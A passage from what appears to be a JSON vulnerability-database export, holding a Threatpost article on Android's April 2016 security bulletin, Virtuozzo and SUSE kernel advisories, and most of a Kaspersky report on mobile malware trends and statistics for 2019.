wants higher code execution, could use it to get access to the microphone or camera, or read email, anything like that,\u201d Avraham said. \u201cBut you do need an initial code execution vulnerability or a presence on the device like an app for example. Then you can use this exploit, which is quite generic, and gain kernel privileges on the device.\u201d\n\nAs is becoming customary, the monthly Nexus security bulletins include fixes for critical Mediaserver and libstagefright vulnerabilities. Since the [Stagefright flaws](<https://threatpost.com/android-stagefright-flaws-put-950-million-devices-at-risk/113960/>) and exploits disclosed last summer during the Black Hat conference, researchers are taking a close look at this [core and privileged component of Android](<https://threatpost.com/stagefright-variant-metaphor-puts-millions-of-samsung-lg-and-htc-phones-at-risk/116870/>). Attackers can exploit these bugs using malicious media files to gain kernel access.\n\n\u201cIt\u2019s old code that\u2019s been there for a long time and it didn\u2019t go through as intense security testing as other pieces of Android,\u201d Zimperium\u2019s Avraham said. \u201cFor some researchers, it doesn\u2019t take much time to discover Stagefright vulnerabilities. If you have a device that\u2019s a few months old and want to target them with [malicious] MP4 files, it\u2019s relatively easy to find a vulnerability there. Every time you have a Stagefright bug and a kernel bug, an attacker can chain both and it\u2019s game over.\u201d\n\nToday\u2019s bulletin patches seven remote code execution bugs in Mediaserver, and one more in libstagefright. The update addresses memory corruption issues in both components.\n\n\u201cStagefright gives an attacker initial code execution,\u201d Avraham said. \u201cYou can send a link and trick the victim into opening it, or get man-in-the-middle and inject an iframe that shows the video, and once loaded\u2014without interaction\u2014the attacker gets initial code execution. To fully hack the device, chain it with a kernel exploit and at that point, you fully control the device.\u201d\n\nAlso patched today, three critical flaws in DHCPCD that open the door to remote code execution in the context of the DHCP client. The DHCP service, Google said, has privileges that third party applications would not.\n\nGoogle also patched a critical flaw in the Media Codec used by Mediaserver, which could be exploited by a crafted file to gain remote code execution.\n\nTwo Qualcomm components, the Qualcomm Performance Module and Qualcomm RF, were patched against elevation of privilege flaws. Both vulnerabilities could be exploited by malicious apps to execute code within the kernel.\n\nThe final critical vulnerability was patched in the common kernel and could also be exploited by a malicious app to gain remote code execution and permanent device compromise.\n\nGoogle also today patched 16 vulnerabilities it rates a \u201chigh\u201d severity, and eight others rated \u201cmoderate.\u201d\n", "modified": "2016-04-04T15:18:56", "published": "2016-04-04T14:00:22", "id": "THREATPOST:D28C91D0999C5EDFA9FCD89F6C95B17D", "href": "https://threatpost.com/google-patches-old-flaw-exploited-by-rooting-application/117161/", "type": "threatpost", "title": "April 2016 Google Android Nexus Security Bulletin", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:15", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "This update provides a new kernel 2.6.32-042stab134.8 for Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 based on the RHEL 6.10 kernel 2.6.32-754.6.3.el6. The new kernel introduces a security and stability fix.\n**Vulnerability id:** CVE-2018-9568\nMemory corruption due to incorrect socket cloning.\n\n", "edition": 1, "modified": "2018-12-12T00:00:00", "published": "2018-12-12T00:00:00", "id": "VZA-2018-087", "href": "https://help.virtuozzo.com/s/article/VZA-2018-087", "title": "Important kernel security update: New kernel 2.6.32-042stab134.8 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "This update provides a new kernel 2.6.32-042stab134.8 for Virtuozzo 6.0 based on the RHEL 6.10 kernel 2.6.32-754.6.3.el6. The new kernel introduces a security and stability fix.\n**Vulnerability id:** CVE-2018-9568\nMemory corruption due to incorrect socket cloning.\n\n", "edition": 1, "modified": "2018-12-12T00:00:00", "published": "2018-12-12T00:00:00", "id": "VZA-2018-086", "href": "https://help.virtuozzo.com/s/article/VZA-2018-086", "title": "Important kernel security update: New kernel 2.6.32-042stab134.8; Virtuozzo 6.0 Update 12 Hotfix 35 (6.0.12-3729)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. The patch applies to all supported Virtuozzo kernels.\n**Vulnerability id:** CVE-2018-9568\nTransforming an IPv6 socket to an IPv4 and then transforming it back to a listening socket could result in a kernel memory corruption. An unprivileged user on the host or in a container could exploit this to crash the kernel.\n\n", "edition": 1, "modified": "2018-12-17T00:00:00", "published": "2018-12-17T00:00:00", "id": "VZA-2018-088", "href": "https://help.virtuozzo.com/s/article/VZA-2018-088", "title": "Important kernel security update: Virtuozzo ReadyKernel patch 68.2 for Virtuozzo 7.0.4 HF3 to 7.0.8 HF1", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-10-27T01:27:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n\n", "modified": "2016-10-27T01:06:19", "published": "2016-10-27T01:06:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html", "id": "SUSE-SU-2016:2657-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:27:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to fix one security\n issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-21T17:17:10", "published": "2016-10-21T17:17:10", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00036.html", "id": "SUSE-SU-2016:2585-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2020-03-24T11:38:55", "bulletinFamily": "blog", "cvelist": ["CVE-2016-5195"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Figures of the year\n\nIn 2019, Kaspersky mobile products and technologies detected:\n\n * 3,503,952 malicious installation packages.\n * 69,777 new mobile banking Trojans.\n * 68,362 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn summing up 2019, two trends in particular stick out:\n\n * Attacks on users' personal data became more frequent.\n * Detections of Trojans on the most popular application marketplaces became more frequent.\n\nThis report discusses each in more detail below, with examples and statistics.\n\n### Attacks on personal data: stalkerware\n\nOver the past year, the number of attacks on the personal data of mobile device users increased by half: from 40,386 unique users in 2018 to 67,500 in 2019. This is not about classic spyware or Trojans, but so-called [stalkerware](<https://encyclopedia.kaspersky.com/glossary/stalkerware-spouseware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\n_Number of unique users attacked by stalkerware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152357/mobile_report_2019_01-en-stalkerware-users.png>)\n\nStalkerware can be divided into two major categories:\n\n * Trackers.\n * Full-fledged tracking apps.\n\nThe creators of trackers generally focus on two main features: tracking victims' coordinates and intercepting text messages. Until recently, many such apps, mostly free, were available on the official Google Play marketplace. After [Google Play changed its policy](<https://play.google.com/about/privacy-security-deception/malicious-behavior/>) in late 2018, most of them were removed from the store, and most developers pulled support for their products. However, such trackers can still be found on their developers' and third-party sites.\n\nIf such an app gets onto a device, messages and data about the user's location become accessible to third parties. These third parties are not necessarily only those tracking the user: the client-server interaction of some services ignores even the minimum security requirements, allowing anyone to gain access to the accumulated data.\n\nThe situation of full-fledged stalkerware is somewhat different: there are no such apps on Google Play, but they are actively supported by developers. These tend to be commercial solutions with extensive spying capabilities. They can harvest almost any data on a compromised device: photos (both entire archives and individual pictures, for example, taken at a certain location), phone calls, texts, location information, screen taps (keylogging), and so on. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152711/mobile_report_2019_stalk_screen.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the capabilities of the software_\n\nMany apps exploit root privileges to extract messaging history from protected storage in social networking and instant messaging applications. If it cannot gain the required access, the stalkerware can take screenshots, log screen taps and even extract the text of incoming and outgoing messages from the windows of popular services using the Accessibility feature. One example is the commercial spyware app Monitor Minor.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152741/mobile_report_2019_stalk_screen_features.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the software's ability to intercept data from social networks and messengers_\n\nThe developers of the [commercial spyware FinSpy](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) went one step further by adding a feature to intercept correspondence in secure messengers, such as Signal, Threema and others. To ensure interception, the app independently obtains root privileges by exploiting the vulnerability CVE-2016-5195, aka \"Dirty Cow\". The expectation is that the victim is using an old device with an outdated operating system kernel in which the exploit can escalate privileges to root.\n\nIt is worth noting that the user base of messaging apps includes hundreds of millions. Classic calls and texts are being used less and less, and communication \u2014 be it text messages or voice/video calls \u2014 is gradually moving to instant messaging applications. Hence the rising interest in data stored in such apps.\n\n### Attacks on personal data: advertising apps\n\nIn 2019, we observed a significant increase in the number of [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) threats, one purpose being to harvest personal data on mobile devices.\n\nThe statistics show that the number of users attacked by adware in 2019 is roughly unchanged from 2018. \n\n_Number of users attacked by adware in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152401/mobile_report_2019_02-en-adware-users.png>)\n\nAt the same time, the number of detected adware installation packages almost doubled from 2018.\n\n_Number of detected adware installation packages in 2018 and 2019._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152406/mobile_report_2019_03-adware-pkg.png>)\n\nThese indicators typically correlate, but not in the case of adware. This can be explained by several factors:\n\n * Adware installation packages are generated automatically and spread literally everywhere, but for some reason do not reach the target audience. It is possible that they get detected immediately after being generated and cannot propagate further. \n * Often, such apps contain nothing useful \u2014 just an adware module; so the victim immediately deletes them, assuming that they allow removing themselves.\n\nNevertheless, it is the second successive year that adware has appeared in our Top 3 detected threats. KSN statistics confirm it to be one of the most common types of threats: four places in our Top 10 mobile threats by number of users attacked in 2019 are reserved for adware-class apps, with one member of the family, HiddenAd, taking the third. \n\n| \u0412\u0435\u0440\u0434\u0438\u043a\u0442 | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 35,83 \n2 | Trojan.AndroidOS.Boogr.gsh | 8,30 \n3 | AdWare.AndroidOS.HiddenAd.et | 4,60 \n4 | AdWare.AndroidOS.Agent.f | 4,05 \n5 | Trojan.AndroidOS.Hiddapp.ch | 3,89 \n6 | DangerousObject.AndroidOS.GenericML | 3,85 \n7 | AdWare.AndroidOS.HiddenAd.fc | 3,73 \n8 | Trojan.AndroidOS.Hiddapp.cr | 2,49 \n9 | AdWare.AndroidOS.MobiDash.ap | 2,42 \n10 | Trojan-Dropper.AndroidOS.Necro.n | 1,84 \n \n_*Share of all users attacked by this type of malware in the total number of users attacked._\n\nIn 2019, mobile adware developers not only generated tens of thousands of packages, but also technically enhanced their products, in particular through the addition of techniques to bypass operating system restrictions. \n\nFor example, Android imposes certain restrictions on background operation of applications for battery-saving reasons. This negatively impacts the operation of various threats, including adware apps that like to lurk in the background and wait for, say, a new banner to arrive from C&amp;C. The introduction of such restrictions made it impossible for apps to show ads outside the context of their own window, thus starving most adware of oxygen.\n\nThe creators of the KeepMusic adware family found a smart workaround. To bypass the restrictions, their software does not request permissions like, for example, malware does. Instead, the program starts looping an MP3 file that plays silence. The operating system decides that the music player is running, and does not terminate the KeepMusic background process. As a result, the adware can request a banner from the server and display it any time. \n\n### Attacks on personal data: exploiting access to Accessibility\n\nThe year 2019 saw the appearance of the first specimen of mobile financial malware (Trojan-Banker.AndroidOS.Gustuff.a), featuring enhanced autonomy. Until then, two methods had been used to steal money from bank accounts: \n\n * **Via SMS banking on the victim end.** This is an autonomous theft technique that requires only information about the transfer recipient. This data the bot can either store in its body or receive as a command from C&amp;C. The Trojan infects the device and sends a text with a transfer request to a special bank phone number. The bank then automatically transfers the funds to the recipient from the device owner's account. Due to the increase in such theft, limits on mobile transfers have been tightened, so this attack vector has been relegated to backup.\n * **By stealing online banking credentials.** This has been the dominant method in recent years. Cybercriminals display a phishing window on the victim's device that mimics the bank's login page and reels in the victim's credentials. In this case, the cybercriminals need to carry out the transaction themselves, using the app on their own mobile device or a browser. It is possible that the bank's anti-fraud systems can detect the abnormal activity and block it, leaving the attackers empty-handed even if the victim's device is infected. \n\nIn 2019, cybercriminals mastered a third method: stealing by manipulating banking apps. First, the victim is persuaded to run the app and sign in, for example, using a fake push notification supposedly from the bank. Tapping the notification does indeed open the banking app, which the attackers, using Accessibility, gain full control over, enabling them to fill out forms, tap buttons, etc. Moreover, the bot operator does not need to do anything, because the malware performs all actions required. Such transactions are trusted by banks, and the maximum transfer amount can exceed the limits of SMS banking by an order of magnitude. As a result, the cybercriminals can clean out the account in one go. \n\nStealing funds from bank accounts is just one malicious use of Accessibility. In effect, any malware with these permissions can control all on-screen processes, while any Android app is basically a visual representation of buttons, data entry forms, information display, and so on. Even if developers implement their own control elements, such as a slider that needs to be moved at a certain speed, this too can be done using Accessibility commands. Thus, cybercriminals have tremendous leeway to create what are perhaps the most dangerous classes of mobile malware: spyware, banking Trojans and ransomware Trojans.\n\nThe misuse of the Accessibility features poses a serious threat to users' personal data. Where previously cybercriminals had to [overlay](<https://encyclopedia.kaspersky.com/glossary/overlaying-overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) phishing windows and request a bunch of permissions in order to steal personal information, now victims themselves output all necessary data to the screen or enter it in forms, where it can be easily gleaned. And if the malware needs more, it can open the Settings section by itself, tap a few buttons, and obtain the necessary permissions. \n\n### Mobile Trojans on popular marketplaces: Google Play\n\nSlipping malware into the main Android app store delivers much better results than social engineering victims into installing apps from third-party sources. In addition, this approach enables attackers to:\n\n * Bypass SafetyNet, Android's built-in antivirus protection. If a user downloads an app from Google Play, the likelihood that it will be installed without additional requests \u2014 for example, to disable the built-in protection under an imaginary pretext \u2014 is very high. The only thing that can protect the user from infection in that situation is a third-party security solution.\n * Overcome psychological barriers. Official app stores enjoy far greater trust than third-party \"markets,\" and act as store windows of sorts that can be used for distributing software much more efficiently.\n * Target victims without unnecessary spending. Google Play can be used to host fakes that visually mimic, say, popular banking apps. This was the distribution vector used in a spate of attacks on mobile users in Brazil: we detected [numerous malicious programs](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>) on Google Play under the guise of mobile apps for Brazilian banks.\n\nIn addition to malicious doppelgangers, cybercriminals deployed several other tricks to maximize device infection rates: \n\n * The [case of CamScanner](<https://securelist.com/dropper-in-google-play/92496/>) showed that an app's legitimate behavior can be supplemented with malicious functions by updating its code for handling advertising. This could be described as the most sophisticated attack vector, since its success depends on a large number of factors, including the user base of the host app, the developer's trust in third-party advertising code and the type of malicious activity. \n * [Another example](<https://securelist.com/mobile-subscriptions/91211/>) demonstrates that attackers sometimes upload to Google Play fairly well-behaved apps from popular user categories. In this case, it was photo editors. \n * The most depressing case involves a Trojan from the Joker family, of which we have found many samples on Google Play, and still are. Deploying the tactic of mass posting, cybercriminals uploaded apps under all kinds of guises: from wallpaper-changing tools and security solutions to popular games. In some cases, the Trojan scored hundreds of thousands of downloads. No other attack vector can reach this kind of audience within such a short space of time.\n\nThe good news is that Google and the antivirus industry have [teamed up](<https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html>) to fight threats on the site. This approach should prevent most malware from penetrating the official Google app store.\n\n## Statistics\n\nIn 2019, we discovered 3,503,952 mobile malicious installation packages, which is 1,817,190 less than in the previous year. We have not detected so few mobile threats since 2015.\n\n_Number of mobile malicious installation packages for Android in 2015\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152410/mobile_report_2019_04-total-apk.png>)\n\nFor three consecutive years, we have seen an overall decline in the number of mobile threats distributed as installation packages. The picture largely depends on specific cybercriminal campaigns: some have become less active, others have completely ceased, and new players have yet to gain momentum. \n\nThe situation is similar with the number of attacks using mobile threats: whereas in 2018 we observed a total of **116.5 million** attacks, in 2019 the figure was down to **80 million**.\n\n_Number of attacks defeated by Kaspersky mobile solutions in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152415/mobile_report_2019_05-en-total-attacks.png>)\n\nThe figures were back to the year before, before the start of the Asacub banking Trojan epidemic.\n\nSince the number of attacks correlates with the number of users attacked, we observed a similar picture for this indicator.\n\n_Number of users attacked by mobile malware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152419/mobile_report_2019_06-en-total-attack-users.png>)\n\n_Geography of attacked users in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152424/mobile_report_2019_07-en-geo-attack-users.png>)\n\n**Top 10 countries by share of users attacked by mobile malware:**\n\nCountry* | %** \n---|--- \nIran | 60.64 \nPakistan | 44.43 \nBangladesh | 43.17 \nAlgeria | 40.20 \nIndia | 37.98 \nIndonesia | 35.12 \nNigeria | 33.16 \nTanzania | 28.51 \nSaudi Arabia | 27.94 \nMalaysia | 27.36 \n \n_*Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._ \n_**Unique users attacked in the country as a percentage of all users of Kaspersky mobile security solutions in the country._\n\nIn 2019, Iran (60.64%) again topped the list for the third year in a row. The most common threats in that country come from adware and potentially unwanted software: Trojan.AndroidOS.Hiddapp.bn, AdWare.AndroidOS.Agent.fa, and RiskTool.AndroidOS.Dnotua.yfe.\n\nPakistan (44.43%) climbed from seventh to second place, mainly on the back of a rise in the number of users attacked by adware. The largest contribution was made by members of the AdWare.AndroidOS.HiddenAd family. A similar picture can be seen in Bangladesh (43.17%), whose share has grown due to the same adware families. \n\n### Types of mobile threats\n\n_Distribution of new mobile threats by type in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152430/mobile_report_2019_08-en-threat-types.png>)\n\nIn 2019, the share of RiskTool-class threats decreased by 20 p.p. (32.46%). We believe the main reason to be the sharp drop in the generation of threats from the SMSreg family. A characteristic feature of this family is payments via SMS: for example, money transfers or subscriptions to mobile services. Moreover, the user is not explicitly informed of the payment or money being charged to their mobile account. Whereas in 2018, we picked up 1,970,742 SMSreg installation packages, the number decreased by an order of magnitude to 193,043 in 2019. At the same time, far from declining, the number of packages of other members of this class of threats increased noticeably.\n\n| Name of family | %* \n---|---|--- \n1 | Agent | 27.48 \n2 | SMSreg | 16.89 \n3 | Dnotua | 13.83 \n4 | Wapron | 13.73 \n5 | SmsSend | 9.15 \n6 | Resharer | 4.62 \n7 | SmsPay | 3.55 \n8 | PornVideo | 2.51 \n9 | Robtes | 1.23 \n10 | Yoga | 1.03 \n \n_*Share of packages of this family in the total number of riskware-class packages detected in 2019._\n\nSkymobi and Paccy dropped out of the Top 10 families of potentially unwanted software; the number of installation packages of these families detected in 2019 decreased tenfold. Their creators likely minimized or even ceased their development and distribution. However, a new player appeared: the Resharer family (4.62%), which ranked sixth. This family is noted for its self-propagation through posting information about itself on various sites and mailing it to the victim's contacts.\n\nAdware demonstrated the most impressive growth, up by 14 p.p. The main source of this growth was HiddenAd (26.81%); the number of installation packages of this family increased by two orders of magnitude against 2018. \n\n| Name of family | %* \n---|---|--- \n1 | HiddenAd | 26.81 \n2 | MobiDash | 20.45 \n3 | Ewind | 16.34 \n4 | Agent | 15.27 \n5 | Dnotua | 5.51 \n6 | Kuguo | 1.36 \n7 | Dowgin | 1.28 \n8 | Triada | 1.20 \n9 | Feiad | 1.01 \n10 | Frupi | 0.94 \n \n_*Share of packages of this family in the total number of adware-class packages detected in 2019._\n\nSignificant growth also came from the MobiDash (20.45%) and Ewind (16.34%) families. Meanwhile, the Agent family (15.27%), which held a leading position in 2018, dropped to fourth place.\n\nCompared to 2018, the number of mobile Trojans detected decreased sharply. A downward trend has been observed for two consecutive years now, yet droppers remain one of the most numerous malware classes. The [Hqwar family](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) showed the most notable decrease: down from 141,000 packages in 2018 to 22,000 in 2019. At the same time, 2019 saw the debut of the Ingopack family: we detected 115,654 samples of this dropper. \n\nMeanwhile, the share of Trojan-class threats rose by 6 p.p., with the two most numerous malware families of this class being Boogr and Hiddapp. The Boogr family contains various Trojans that have been detected using machine-learning (ML) technology. A feature of the Hiddapp family is that it hides its icon in the list of installed apps while continuing to run in the background.\n\nThe share of mobile ransomware Trojans slightly increased. The Top 3 families of this class of threats remained the same as in 2018: Svpeng, Congur, and Fusob \u2014 in that order. \n\n### Top 20 mobile malware programs\n\nThe following malware rankings omit potentially unwanted software, such as RiskTool and AdWare.\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 49.15 \n2 | Trojan.AndroidOS.Boogr.gsh | 10.95 \n3 | Trojan.AndroidOS.Hiddapp.ch | 5.19 \n4 | DangerousObject.AndroidOS.GenericML | 5.08 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 3.45 \n6 | Trojan.AndroidOS.Hiddapp.cr | 3.28 \n7 | Trojan-Banker.AndroidOS.Asacub.snt | 2.35 \n8 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.10 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 1.76 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.66 \n11 | Trojan-Downloader.AndroidOS.Helper.a | 1.65 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.60 \n13 | Trojan-Downloader.AndroidOS.Necro.b | 1.59 \n14 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n15 | Exploit.AndroidOS.Lotoor.be | 1.46 \n16 | Trojan.AndroidOS.Hiddapp.cf | 1.35 \n17 | Trojan.AndroidOS.Dvmap.a | 1.33 \n18 | Trojan-Banker.AndroidOS.Agent.ep | 1.31 \n19 | Trojan.AndroidOS.Agent.rt | 1.28 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.14 \n \n_*Share of users attacked by this type of malware out of all attacked users_\n\nAs we wrap up the year 2019, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (49.15%), which we use for malware detected with cloud technology. The verdict is applied where the antivirus databases still have no signatures or heuristics for malware detection. This way, the most recent malware is uncovered.\n\nIn second place came the verdict Trojan.AndroidOS.Boogr.gsh (10.95%). This verdict is assigned to files recognized as malicious by our ML-based system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (5.08%, fourth place in the rating). This verdict is assigned to files whose structure is identical to that of malicious files.\n\nThird, sixth, and sixteenth places were taken by members of the Hiddapp family. We assign this verdict to any app that hides its icon in the list of apps immediately after starting. Subsequent actions of such apps may be anything from downloading or dropping other apps to displaying ads.\n\nFifth and thirteenth places went to members of the Necro family of droppers and loaders. In both threat classes, Necro members did not make it into the Top 10 by number of detected files. Even the weakened Hwar family of droppers strongly outperformed Necro by number of generated objects. That said, users often encountered Necro members due to the family's penetration of Google Play.\n\nSeventh and tenth places went to the Asacub family of banking Trojans. Whereas at the start of the year, the Trojan's operators were still actively spreading the malware, starting in March 2019, we noticed a drop in this family's activity. \n\n_Number of unique users attacked by the Asacub mobile banking Trojan in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152434/mobile_report_2019_09-en-asacub-attacks.png>)\n\nEighth and fourteenth places were reserved for droppers in the Hqwar family. Their activity dropped significantly from 80,000 attacked users in 2018 to 28,000 in 2019. However, we continue to register infection attempts by this family, and do not rule out its return to the top.\n\n_Number of unique users attacked by the Hqwar mobile dropper in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152439/mobile_report_2019_10-en-hqwar-attacks.png>)\n\nIn ninth position is another dropper, this time from the Lezok family: Trojan-Dropper.AndroidOS.Lezok.p (1.76%). A notable difference between this Trojan and Hqwar is that the malware penetrates the device before it arrives at the store. This is evidenced by KSN statistics showing that the Trojan was most often detected in the system directory under the names PhoneServer, GeocodeService, and similar. \n\n| Path to the detected threat | Number of unique users attacked \n---|---|--- \n1 | /system/priv-app/PhoneServer/ | 49,688 \n2 | /system/priv-app/GeocodeService/ | 9747 \n3 | /system/priv-app/Helper/ | 6784 \n4 | /system/priv-app/com.android.telephone/ | 5030 \n5 | /system/priv-app/ | 1396 \n6 | /system/priv-app/CallerIdSearch/ | 1343 \n \nWhen the device is turned on, Lezok dumps its payload into the system; it does so even if the victim deletes the dumped files using regular OS tools or resets the device to the factory settings. The trick is that the Trojan forms part of the factory firmware and can reload (restore) the deleted files.\n\nThe final Trojan worthy of attention is Trojan-Downloader.AndroidOS.Helper.a (1.56%), which finished eleventh in the rankings. Despite claims to the contrary, it can be removed. However, the infected system contains another Trojan that installs a helper app, which cannot be removed that easily. According to KSN statistics, members of the Trojan-Downloader.AndroidOS.Triada and Trojan.AndroidOS.Dvmap families can act as delivery vehicles for the helper. After the victim removes the helper, a member of one of these two families loads and reinstalls it. \n\n### Mobile banking Trojans\n\nIn 2019, we detected 69,777 installation packages for mobile banking Trojans, which is half last year's figure. However, the share of banking Trojans out of all detected threats grew slightly as a consequence of the declining activity of other classes and families of mobile malware.\n\n_Number of installation packages of mobile banking Trojans detected by Kaspersky in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152443/mobile_report_2019_11-bankers-install-packages.png>)\n\nThe number of detected installation packages for banking Trojans as well as the number of attacks were influenced by the campaign to distribute the Asacub Trojan, whose activity has plummeted starting in April 2019. \n\n_Number of attacks by mobile banking Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152448/mobile_report_2019_12-en-bankers-attacks.png>)\n\nIt is worth noting that the average number of attacks over the year was approximately 270,000 per month. \n\n**Top 10 countries by share of users attacked by banking Trojans**\n\n| Country | %* \n---|---|--- \n1 | Russia | 0.72 \n2 | South Africa | 0.66 \n3 | Australia | 0.59 \n4 | Spain | 0.29 \n5 | Tajikistan | 0.21 \n6 | Turkey | 0.20 \n7 | USA | 0.18 \n8 | Italy | 0.17 \n9 | Ukraine | 0.17 \n10 | Armenia | 0.16 \n \n_*Share of users attacked by mobile bankers out of all attacked users_\n\nRussia (0.72%) has headed our Top 10 for three consecutive years: many different Trojan families are focused on stealing credentials from Russian banking apps. These Trojans operate in other countries as well. Thus, Asacub is the number one threat in Tajikistan, Ukraine, and Armenia, while the Svpeng family of Trojans is active in Russia and the US.\n\nIn South Africa (0.66%), the most common Trojan was Trojan-Banker.AndroidOS.Agent.dx, accounting for 95% of all users attacked by banking threats. \n\nThe most widespread Trojan in Australia (0.59%) was Trojan-Banker.AndroidOS.Agent.eq (77% of all users attacked by banking threats).\n\nIn Spain (0.29%), banking malware from the Cebruser and Trojan-Banker.AndroidOS.Agent.ep families are popular with cybercriminals (49% and 22% of all users attacked by banking threats, respectively).\n\n**Top 10 families of mobile bankers in 2019**\n\n| Family | %* \n---|---|--- \n1 | Asacub | 44.40 \n2 | Svpeng | 22.40 \n3 | Agent | 19.06 \n4 | Faketoken | 12.02 \n5 | Hqwar | 3.75 \n6 | Anubis | 2.72 \n7 | Marcher | 2.07 \n8 | Rotexy | 1.46 \n9 | Gugi | 1.34 \n10 | Regon | 1.01 \n \n_*Share of users attacked by this family of mobile bankers out of all users attacked by mobile banking Trojans_\n\n### Mobile ransomware Trojans\n\nIn 2019, we detected 68,362 installation packages for ransomware Trojans, which is 8,186 more than in the previous year. However, we observed a decline in the generation of new ransomware packages throughout 2019. The minimum was recorded in December. \n\n_Number of new installation packages for mobile banking Trojans in Q1\u2013Q4 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152452/mobile_report_2019_13-ransomware-packages.png>)\n\nA similar picture is seen for attacked users. Whereas in early 2019, the number of attacked users peaked at 12,004, by the end of the year, the figure had decreased 2.6 times.\n\n_Number of users attacked by mobile ransomware Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152457/mobile_report_2019_14-en-ransom-attack-users.png>)\n\n_Countries by share of users attacked by mobile ransomware in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152502/mobile_report_2019_15-en-ransomware-geo.png>)\n\n**Top 10 countries by share of users attacked by ransomware Trojans**\n\n| Country* | %** \n---|---|--- \n1 | USA | 2.03 \n2 | Kazakhstan | 0.56 \n3 | Iran | 0.37 \n4 | Mexico | 0.11 \n5 | Saudi Arabia | 0.10 \n6 | Pakistan | 0.10 \n7 | Canada | 0.10 \n8 | Italy | 0.09 \n9 | Indonesia | 0.08 \n10 | Australia | 0.06 \n \n_*Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period. \n**Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nFor the third year in a 